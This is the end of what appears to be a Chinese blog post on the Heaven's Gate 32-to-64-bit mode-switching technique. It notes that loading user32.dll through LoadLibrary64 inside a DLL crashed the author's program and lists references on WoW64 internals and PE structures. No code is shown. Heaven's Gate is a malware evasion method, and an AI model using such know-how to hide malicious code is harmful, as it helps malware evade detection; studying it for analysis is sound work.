  2. 在DLL中无法加载user32.dll。至少在我的环境下,LoadLibrary64("user32.dll")直接导致整个程序崩溃

最后,由于我在Windows和恶意代码这块还是新手,难免有理解不当的地方,如果文章内容有什么问题欢迎各位师傅指正!

0x04. 参考资料

  1. Knockin’ on Heaven’s Gate – Dynamic Processor Mode Switching by george_nicolaou

  2. Mixing x86 with x64 code by ReWolf

  3. WoW64 internals by wbenny

  4. Heavens-Gate-2.0 by sdadas190

  5. 天堂之门技术 by Tardis

  6. Rebuild The Heaven’s Gate: from 32-bit Hell back to 64-bit Wonderland by Sheng-Hao Ma

  7. 通过PEB结构遍历进程模块

  8. PE基础2-导出表-导入表